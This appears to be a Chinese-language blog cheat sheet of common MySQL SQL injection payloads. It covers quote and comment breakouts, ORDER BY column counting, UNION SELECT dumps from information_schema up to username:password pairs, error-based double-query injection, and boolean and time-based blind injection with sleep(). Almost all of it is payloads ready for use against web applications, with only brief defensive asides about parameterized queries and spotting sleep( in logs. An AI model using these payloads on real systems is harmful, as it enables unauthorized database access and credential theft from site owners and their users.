常見注入語句

2022-08-19 22:54:08 字數 4212 閱讀 9865

#常規注入

'--+

' --%20

'#

' %23

'and 1=1 --+

'and 1=2 --+

'and 1=2 union select * from admin --+

'and 1=2 union select * from user --+

'and 1=2 union select * from users --+

#爆字段數(判斷原查詢返回幾列)

' order by 1 --+

'order by 2 --+

' order by 3 --+

'order by 4 --+

' order by 5 --+

'order by 6 --+

' order by 7 --+

'order by 8 --+

' order by 9 --+

'order by 10 --+

#爆資料庫資訊,這僅限於字段數為1(union 兩側的列數必須一致)

'and 1=2 union all select version() --+

'and 1=2 union all select user() --+

'and 1=2 union all select database() --+

#判斷作業系統

'and 1=2 union all select @@global.version_compile_os from mysql.user --+

#資料庫許可權:114 是字元 r 的 ASCII 碼,返回正常只說明當前使用者名稱以 r 開頭(可能是 root),並不能就此確認許可權

'and ord(mid(user(),1,1))=114 --+

#爆資料

'and 1=2 union select user(),version(),database(),@@datadir,schema_name,current_user(),7,8,9,10 from information_schema.schemata limit 0,1 --+

'and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1--+

'and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=table_name limit 0,1--+

'and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10 from information_schema.columns where table_name=table_name limit 0,1--+

'and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+

'and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+

#不使用注釋符

'and '1

'union select 1 and '1

'union select 1,2 and '1

'and 1=2 union select 1,version(),3 and '1

'or '1

#帶括號防注入(原查詢用括號包裹參數;括號本身擋不住注入,需改用參數化查詢)

') --+

') --%20

') #

') %23

#雙引號防注入(原查詢用雙引號包裹參數;同樣不能代替參數化查詢)

"--+

"--%20

"#

"%23

#雙引號+括號

") --+

") --%20

") #

") %23

#雙查詢注入

#統計有多少條記錄(count(*) 計算的是行數,不是字段數)

select count(*) from table_name;

#隨機數生成

select rand();

select rand()*4;

#浮點數

select floor(rand());

select floor(rand()*4);

#別名

select floor(rand()*4) as query;

#分組

select username,password from user group by username;

#兩次查詢

select(select database());

#連線字串concat(str1,str2)

select concat((select database()));

select concat(0x3a,0x3a,(select database()),0x3a,0x3a);

select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;

select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;

select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;

select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;

select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;

select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;

'and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+

'and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+

#盲注

#bool型盲注

select database();

#判斷長度

select length(database());

#擷取字串substr(str,num1,num2) num1:從第幾個開始取;num2:取多少個

select substr(database(),1,1);

#ascii碼

select ascii(substr(database(),1,1));

'and 1<2 --+

'and (ascii(substr((select database()),1,1)))=98--+

#時間型盲注(特徵是回應被刻意延遲;資料庫查詢日誌或 WAF 日誌中出現 sleep( 即為明顯跡象)

#睡眠

select sleep(1);

#進行判斷

select if((select database())="bloodzero",sleep(10),null);

'and sleep(10) --+

'and if((select database())="bloodzero",sleep(10),null)--+
